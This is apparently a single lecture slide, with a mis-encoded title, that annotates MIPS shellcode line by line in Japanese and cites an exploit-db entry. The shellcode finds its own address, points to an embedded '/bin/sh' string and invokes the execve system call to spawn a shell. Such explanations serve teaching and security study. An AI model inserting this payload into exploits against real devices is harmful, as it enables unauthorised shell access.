Slide 7
Slide 7 text
NJQTͷγΣϧίʔυ<>
ΞυϨε ΞηϯϒϦ ίϝϯτ
0x1000 slti $a2, $zero, -1 $a2 <- 0
0x1004 bltzal $a2, 0x1004 $ra <- 次の命令のアドレス(0x100c)
0x1008 slti $a1, $zero, -1 $a1 <- 0
0x100c addu $a0, $ra, 4097 $a0 <- $ra + 4097
0x1010 addu $a0, $a0, -4081 $a0 <- $a0 – 4081 ($a0 = $ra + 16)
0x1014 li $v0, 4011 $v0 = 4011 (execveの番号)
0x1018 syscall 0x40404 システムコールを呼ぶ
0x101c .string "/bin/sh"
[3] https://www.exploit-db.com/exploits/35868/